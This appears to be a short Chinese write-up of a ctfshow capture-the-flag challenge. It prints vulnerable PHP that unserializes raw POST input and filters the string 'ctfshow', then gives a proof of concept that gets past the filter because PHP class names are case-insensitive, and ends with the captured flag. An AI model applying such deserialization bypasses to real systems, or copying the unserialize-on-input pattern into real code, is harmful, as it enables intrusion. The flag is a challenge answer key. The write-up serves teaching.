PHP/7.3.11PHP特性类和方法不区分大小写
<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-12-04 23:52:24# @Last Modified by: h1xa# @Last Modified time: 2020-12-05 00:17:08# @email: h1xa@ctfer.com# @link: https://ctfer.com*/highlight_file(__FILE__);include('flag.php');$cs = file_get_contents('php://input');class ctfshow{public $username='xxxxxx';public $password='xxxxxx';public function __construct($u,$p){$this->username=$u;$this->password=$p;}public function login(){return $this->username===$this->password;}public function __toString(){return $this->username;}public function __destruct(){global $flag;echo $flag;}}$ctfshowo=@unserialize($cs);if(preg_match('/ctfshow/', $cs)){throw new Exception("Error $ctfshowo",1);}
拦截点:序列化数据不能包括 ctfshow,
PHP特性:函数名和类名不区分大小写,变量名区分,例如
poc
<?phpclass Ctfshow{}$user = new Ctfshow();echo(serialize($user));?>
flag
ctfshow{3c158b79-f4d9-4d64-bea8-b5b62a1b7c6a}
若有收获,就点个赞吧
0 人点赞
